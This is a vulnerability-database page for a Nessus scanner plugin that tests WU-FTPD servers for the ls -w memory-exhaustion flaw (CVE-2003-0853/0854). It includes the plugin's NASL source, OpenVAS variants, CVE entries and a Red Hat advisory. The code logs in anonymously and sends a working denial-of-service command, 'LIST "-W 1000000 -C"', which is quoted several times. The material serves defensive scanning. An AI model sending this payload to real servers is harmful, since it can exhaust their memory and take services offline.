Search...

WU-FTPD fileutils/coreutils ls -w Argument Memory Consumption DoS

2003-10-29T00:00:00

ID WUFTPD_LS_DOS.NASL
Type nessus
Reporter This script is Copyright (C) 2003-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2021-01-02T00:00:00

Description

The version of WU-FTPD on the remote server uses a vulnerable version of /bin/ls. It does not filter arguments to /bin/ls, which could lead to a DoS. It is possible to consume all available memory on the machine by sending :

ls '-w 1000000 -C'

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

# HD Moore suggested fixes and the safe_checks code.
# It is released under the General Public License (GPLv2).
#
# Credit: Georgi Guninski discovered this attack
#

include("compat.inc");

if (description)
{
  script_id(11912);
  script_version("1.24");
  script_cvs_date("Date: 2019/02/26  4:50:08");

  script_cve_id("CVE-2003-0853", "CVE-2003-0854");
  script_bugtraq_id(8875);
  # commenting these out instead of removing
  # these xrefs  get flaged as invalid by validate plugin
  # preventing build from completing
  # script_xref(name:"CONECTIVA", value:"CLA-2003:768");
  # script_xref(name:"zone-h", value:"3299");
  script_xref(name:"Secunia", value:"10059");

  script_name(english:"WU-FTPD fileutils/coreutils ls -w Argument Memory Consumption DoS");
  script_summary(english:"send 'ls -w 1000000 -C' to the remote FTP server.");

  script_set_attribute(attribute:"synopsis", value:
"The remote FTP server is affected by a denial of service
vulnerability." );
  script_set_attribute(attribute:"description", value:
"The version of WU-FTPD on the remote server uses a vulnerable version
of /bin/ls. It does not filter arguments to /bin/ls, which could lead
to a DoS. It is possible to consume all available memory on the
machine  by sending :

ls '-w 1000000 -C'" );
  script_set_attribute(attribute:"see_also", value:"http://www.guninski.com/binls.html" );
  script_set_attribute(attribute:"solution", value:
"Contact your vendor for a fix." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2003-0853");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_publication_date", value: "2003/10/29");
  script_set_attribute(attribute:"vuln_publication_date", value: "2003/05/16");
  
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_MIXED_ATTACK);
  script_family(english: "FTP");

  script_copyright(english:"This script is Copyright (C) 2003-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("ftpserver_detect_type_nd_version.nasl", "ftp_anonymous.nasl");
  script_require_ports("Services/ftp", 21);
  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("ftp_func.inc");

port = get_ftp_port(default: 21);

banner = get_ftp_banner(port:port);

if ( !banner ) audit(AUDIT_NO_BANNER, port);
if ( !egrep(pattern:"(wu|wuftpd)-[0-9]\.", string:banner) )
  audit(AUDIT_NOT_LISTEN, 'WU-FTPD', port);

user = get_kb_item("ftp/login");
pass = get_kb_item("ftp/password");

if (! user)
{
  if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);
  user = "anonymous";
}
if (! pass)
{
  if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);
  pass = "nessus@nessus.org";
}

soc = ftp_open_and_authenticate( user:user, pass:pass, port:port );
if (!soc) exit(0);

port2 = ftp_pasv(socket:soc);
if (!port2)
{
  ftp_close(socket: soc);
  exit(1, "PASV command failed on port "+port+".");
}

soc2 = open_sock_tcp(port2, transport: ENCAPS_IP);

if (!soc2 || safe_checks())
{
  send(socket: soc, data: 'LIST -ABCDEFGHIJKLMNOPQRSTUV\r\n');
  r1 = ftp_recv_line(socket:soc);
  if (egrep(string: r1, pattern: "invalid option|usage:", icase: 1))
    security_hole(port);
  if(soc2)close(soc2);
  ftp_close(socket: soc);
  exit(0);
}

start_denial();

send(socket:soc, data: 'LIST "-W 1000000 -C"\r\n');
r1 = ftp_recv_line(socket:soc);
ftp_recv_listing(socket: soc2);
r2 = ftp_recv_line(socket:soc);
close(soc2);
ftp_close(socket: soc);

alive = end_denial();
if (! alive)
{
  security_hole(port);
  exit(0);
}

if (egrep(string: r2, pattern: "exhausted|failed", icase: 1))
{
  security_hole(port);
  exit(0);
}

soc = ftp_open_and_authenticate( user:user, pass:pass, port:port );
if ( !soc )
{
  security_hole(port);
}
if (soc) ftp_close(socket: soc);

JSON Vulners Source

Initial Source

{"id": "WUFTPD_LS_DOS.NASL", "bulletinFamily": "scanner", "title": "WU-FTPD fileutils/coreutils ls -w Argument Memory Consumption DoS", "description": "The version of WU-FTPD on the remote server uses a vulnerable version\nof /bin/ls. It does not filter arguments to /bin/ls, which could lead\nto a DoS. It is possible to consume all available memory on the\nmachine by sending :\n\nls '-w 1000000 -C'", "published": "2003-10-29T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "href": "https://www.tenable.com/plugins/nessus/11912", "reporter": "This script is Copyright (C) 2003-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.guninski.com/binls.html"], "cvelist": ["CVE-2003-0853", "CVE-2003-0854"], "type": "nessus", "lastseen": "2021-01-01T07:01:06", "edition": 25, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-0853", "CVE-2003-0854"]}, {"type": "redhat", "idList": ["RHSA-2003:310"]}, {"type": "openvas", "idList": ["OPENVAS:11912", "OPENVAS:53532", "OPENVAS:136141256231011912"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2003-310.NASL", "DEBIAN_DSA-705.NASL", "FEDORA_2004-091.NASL", "MANDRAKE_MDKSA-2003-106.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:4621", "OSVDB:4620"]}, {"type": "exploitdb", "idList": ["EDB-ID:115", "EDB-ID:23274"]}, {"type": "debian", "idList": ["DEBIAN:DSA-705-1:CDBB7"]}], "modified": "2021-01-01T07:01:06", "rev": 2}, "score": {"value": 6.2, "vector": "NONE", "modified": "2021-01-01T07:01:06", "rev": 2}, "vulnersScore": 6.2}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# HD Moore suggested fixes and the safe_checks code.\n# It is released under the General Public License (GPLv2).\n#\n# Credit: Georgi Guninski discovered this attack\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11912);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/02/26 4:50:08\");\n\n script_cve_id(\"CVE-2003-0853\", \"CVE-2003-0854\");\n script_bugtraq_id(8875);\n # commenting these out instead of removing\n # these xrefs get flaged as invalid by validate plugin\n # preventing build from completing\n # script_xref(name:\"CONECTIVA\", value:\"CLA-2003:768\");\n # script_xref(name:\"zone-h\", value:\"3299\");\n script_xref(name:\"Secunia\", value:\"10059\");\n\n script_name(english:\"WU-FTPD fileutils/coreutils ls -w Argument Memory Consumption DoS\");\n script_summary(english:\"send 'ls -w 1000000 -C' to the remote FTP server.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FTP server is affected by a denial of service\nvulnerability.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The version of WU-FTPD on the remote server uses a vulnerable version\nof /bin/ls. It does not filter arguments to /bin/ls, which could lead\nto a DoS. It is possible to consume all available memory on the\nmachine by sending :\n\nls '-w 1000000 -C'\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.guninski.com/binls.html\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Contact your vendor for a fix.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2003-0853\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2003/10/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2003/05/16\");\n \n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_MIXED_ATTACK);\n script_family(english: \"FTP\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\", \"ftp_anonymous.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"ftp_func.inc\");\n\nport = get_ftp_port(default: 21);\n\nbanner = get_ftp_banner(port:port);\n\nif ( !banner ) audit(AUDIT_NO_BANNER, port);\nif ( !egrep(pattern:\"(wu|wuftpd)-[0-9]\\.\", string:banner) )\n audit(AUDIT_NOT_LISTEN, 'WU-FTPD', port);\n\nuser = get_kb_item(\"ftp/login\");\npass = get_kb_item(\"ftp/password\");\n\nif (! user)\n{\n if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n user = \"anonymous\";\n}\nif (! pass)\n{\n if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n pass = \"nessus@nessus.org\";\n}\n\nsoc = ftp_open_and_authenticate( user:user, pass:pass, port:port );\nif (!soc) exit(0);\n\nport2 = ftp_pasv(socket:soc);\nif (!port2)\n{\n ftp_close(socket: soc);\n exit(1, \"PASV command failed on port \"+port+\".\");\n}\n\nsoc2 = open_sock_tcp(port2, transport: ENCAPS_IP);\n\nif (!soc2 || safe_checks())\n{\n send(socket: soc, data: 'LIST -ABCDEFGHIJKLMNOPQRSTUV\\r\\n');\n r1 = ftp_recv_line(socket:soc);\n if (egrep(string: r1, pattern: \"invalid option|usage:\", icase: 1))\n security_hole(port);\n if(soc2)close(soc2);\n ftp_close(socket: soc);\n exit(0);\n}\n\nstart_denial();\n\nsend(socket:soc, data: 'LIST \"-W 1000000 -C\"\\r\\n');\nr1 = ftp_recv_line(socket:soc);\nftp_recv_listing(socket: soc2);\nr2 = ftp_recv_line(socket:soc);\nclose(soc2);\nftp_close(socket: soc);\n\nalive = end_denial();\nif (! alive)\n{\n security_hole(port);\n exit(0);\n}\n\nif (egrep(string: r2, pattern: \"exhausted|failed\", icase: 1))\n{\n security_hole(port);\n exit(0);\n}\n\nsoc = ftp_open_and_authenticate( user:user, pass:pass, port:port );\nif ( !soc )\n{\n security_hole(port);\n}\nif (soc) ftp_close(socket: soc);\n", "naslFamily": "FTP", "pluginID": "11912", "cpe": [], "scheme": null, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}}

{"cve": [{"lastseen": "2020-10-03T11:33:03", "description": "ls in the fileutils or coreutils packages allows local users to consume a large amount of memory via a large -w value, which can be remotely exploited via applications that use ls, such as wu-ftpd.", "edition": 3, "cvss3": {}, "published": "2003-11-17T05:00:00", "title": "CVE-2003-0854", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0854"], "modified": "2017-10-11T01:29:00", "cpe": ["cpe:/a:washington_university:wu-ftpd:2.6.1", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr4", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr6", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr14", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr9", "cpe:/a:gnu:fileutils:4.0", "cpe:/a:washington_university:wu-ftpd:2.6.2", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta2", "cpe:/a:washington_university:wu-ftpd:2.4.2_vr17", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr8", "cpe:/a:gnu:fileutils:4.0.36", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr12", "cpe:/a:washington_university:wu-ftpd:2.6.0", "cpe:/a:gnu:fileutils:4.1.6", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr5", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr11", "cpe:/a:washington_university:wu-ftpd:2.5.0", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr7", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr13", "cpe:/a:washington_university:wu-ftpd:2.4.2_vr16", "cpe:/a:washington_university:wu-ftpd:2.4.1", "cpe:/a:gnu:fileutils:4.1.7", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr15", "cpe:/a:gnu:fileutils:4.1", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr10"], "id": "CVE-2003-0854", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0854", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr5:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr14:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:fileutils:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr7:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr15:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:fileutils:4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta2:*:academ:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr4:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:fileutils:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr12:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr8:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18:*:academ:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr13:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:fileutils:4.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:fileutils:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr9:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr11:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_vr17:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_vr16:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:33:03", "description": "An integer overflow in ls in the fileutils or coreutils packages may allow local users to cause a denial of service or execute arbitrary code via a large -w value, which could be remotely exploited via applications that use ls, such as wu-ftpd.", "edition": 3, "cvss3": {}, "published": "2003-11-17T05:00:00", "title": "CVE-2003-0853", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0853"], "modified": "2008-09-10T19:20:00", "cpe": ["cpe:/a:washington_university:wu-ftpd:2.6.1", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr4", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr6", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr14", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr9", "cpe:/a:gnu:fileutils:4.0", "cpe:/a:washington_university:wu-ftpd:2.6.2", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta2", "cpe:/a:washington_university:wu-ftpd:2.4.2_vr17", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr8", "cpe:/a:gnu:fileutils:4.0.36", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr12", "cpe:/a:washington_university:wu-ftpd:2.6.0", "cpe:/a:gnu:fileutils:4.1.6", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr5", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr11", "cpe:/a:washington_university:wu-ftpd:2.5.0", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr7", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr13", "cpe:/a:washington_university:wu-ftpd:2.4.2_vr16", "cpe:/a:washington_university:wu-ftpd:2.4.1", "cpe:/a:gnu:fileutils:4.1.7", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr15", "cpe:/a:gnu:fileutils:4.1", "cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr10"], "id": "CVE-2003-0853", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0853", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr5:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr14:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:fileutils:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr7:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr15:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:fileutils:4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta2:*:academ:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr4:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:fileutils:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr12:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr8:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18:*:academ:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr13:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:fileutils:4.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:fileutils:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr9:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_beta18_vr11:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_vr17:*:*:*:*:*:*:*", "cpe:2.3:a:washington_university:wu-ftpd:2.4.2_vr16:*:*:*:*:*:*:*"]}], "redhat": [{"lastseen": "2019-08-13T18:46:41", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0853", "CVE-2003-0854"], "description": "The fileutils package contains several basic system utilities. One of\nthese utilities is the \"ls\" program, which is used to list information\nabout files and directories. \n\nGeorgi Guninski discovered a memory starvation denial of service\nvulnerability in the ls program. It is possible to make ls allocate a\nhuge amount of memory by specifying certain command line arguments. This\nvulnerability is remotely exploitable through services like wu-ftpd, which\npass user arguments to ls. The Common Vulnerabilities and Exposures\nproject (cve.mitre.org) has assigned the name CAN-2003-0854 to this issue.\n\nA non-exploitable integer overflow in ls has been discovered. It is\npossible to make ls crash by specifying certain command line arguments. \nThis vulnerability is remotely exploitable through services like wu-ftpd,\nwhich pass user arguments to ls. The Common Vulnerabilities and Exposures\nproject (cve.mitre.org) has assigned the name CAN-2003-0853 to this issue.\n\nUsers are advised to update to these erratum packages, which contain\nbackported security patches that correct these vulnerabilities.\n\nThese packages also add support for the O_DIRECT flag, which controls the\nuse of synchronous I/O on file systems such as OCFS.", "modified": "2018-03-14T19:26:45", "published": "2003-11-12T05:00:00", "id": "RHSA-2003:310", "href": "https://access.redhat.com/errata/RHSA-2003:310", "type": "redhat", "title": "(RHSA-2003:310) fileutils security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2017-07-02T21:10:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0853", "CVE-2003-0854"], "description": "The FTP server does not filter arguments to the ls command. \nIt is possible to consume all available memory on the machine \nby sending \n\tls '-w 1000000 -C'\nSee http://www.guninski.com/binls.html", "modified": "2017-05-01T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:11912", "href": "http://plugins.openvas.org/nasl.php?oid=11912", "type": "openvas", "title": "wu-ftpd ls -W memory exhaustion", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: wuftpd_ls_DoS.nasl 6053 2017-05-01 09:02:51Z teissa $\n# Description: wu-ftpd ls -W memory exhaustion\n#\n# Authors:\n# Michel Arboi <arboi@alussinan.org>\n# HD Moore suggested fixes and the safe_checks code.\n#\n# Copyright:\n# Copyright (C) 2003 Michel Arboi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_solution = \"Contact your vendor for a fix\";\n\ntag_summary = \"The FTP server does not filter arguments to the ls command. \nIt is possible to consume all available memory on the machine \nby sending \n\tls '-w 1000000 -C'\nSee http://www.guninski.com/binls.html\";\n\n# Credit: Georgi Guninski discovered this attack\n\n\nif (description)\n{\n script_id(11912);\n script_version(\"$Revision: 6053 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-01 11:02:51 +0200 (Mon, 01 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(8875);\n script_cve_id(\"CVE-2003-0853\", \"CVE-2003-0854\");\n script_xref(name: \"CONECTIVA\", value: \"CLA-2003:768\");\n script_xref(name: \"zone-h\", value: \"3299\");\n\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n name = \"wu-ftpd ls -W memory exhaustion\";\n script_name( name);\n\n\n\n script_category(ACT_MIXED_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family( \"FTP\");\n\n script_copyright(\"Copyright (C) 2003 Michel Arboi\");\n script_dependencies(\"find_service.nasl\", \"secpod_ftp_anonymous.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n exit(0);\n}\n\n\n#\n\ninclude(\"ftp_func.inc\");\n\nport = get_kb_item(\"Services/ftp\");\nif (!port) port = 21;\nif (!get_port_state(port)) exit(0);\n\nuser = get_kb_item(\"ftp/login\");\npass = get_kb_item(\"ftp/password\");\n\nif (! user) user = \"anonymous\";\nif (! pass) pass = \"openvas@example.com\";\n\nsoc = open_sock_tcp(port);\nif (!soc) exit(0);\n\nif (! ftp_authenticate(socket:soc, user: user, pass: pass)) exit(0);\n\nport2 = ftp_pasv(socket:soc);\nif (!port2)\n{\n ftp_close(socket: soc);\n exit(0);\n}\n\nsoc2 = open_sock_tcp(port2, transport: ENCAPS_IP);\n\nif (!soc2 || safe_checks())\n{\n send(socket: soc, data: 'LIST -ABCDEFGHIJKLMNOPQRSTUV\\r\\n');\n r1 = ftp_recv_line(socket:soc);\n if (egrep(string: r1, pattern: \"invalid option|usage:\", icase: 1))\n security_message(port);\n if(soc2)close(soc2);\n ftp_close(socket: soc);\n exit(0);\n}\n \nstart_denial();\n\nsend(socket:soc, data: 'LIST \"-W 1000000 -C\"\\r\\n');\nr1 = ftp_recv_line(socket:soc);\nl = ftp_recv_listing(socket: soc2);\nr2 = ftp_recv_line(socket:soc);\nclose(soc2);\nftp_close(socket: soc);\n\nalive = end_denial();\nif (! alive)\n{\n security_message(port);\n exit(0);\n}\n\nif (egrep(string: r2, pattern: \"exhausted|failed\", icase: 1))\n{\n security_message(port);\n exit(0);\n}\n\nsoc = open_sock_tcp(port);\nif (! soc || ! ftp_authenticate(socket:soc, user: user, pass: pass))\n security_message(port);\nif (soc) ftp_close(socket: soc);\n\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-11-06T12:02:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0853", "CVE-2003-0854"], "description": "The FTP server does not filter arguments to the ls command.", "modified": "2019-10-29T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231011912", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231011912", "type": "openvas", "title": "wu-ftpd ls -W memory exhaustion", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# wu-ftpd ls -W memory exhaustion\n#\n# Authors:\n# Michel Arboi <arboi@alussinan.org>\n# HD Moore suggested fixes and the safe_checks code.\n#\n# Copyright:\n# Copyright (C) 2003 Michel Arboi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:washington_university:wu-ftpd\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.11912\");\n script_version(\"2019-10-29T09:45:45+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-29 09:45:45 +0000 (Tue, 29 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(8875);\n script_cve_id(\"CVE-2003-0853\", \"CVE-2003-0854\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"wu-ftpd ls -W memory exhaustion\");\n script_category(ACT_DENIAL);\n script_family(\"FTP\");\n script_copyright(\"Copyright (C) 2003 Michel Arboi\");\n script_dependencies(\"gb_wu-ftpd_detect.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_mandatory_keys(\"wu-ftpd/installed\");\n\n script_xref(name:\"URL\", 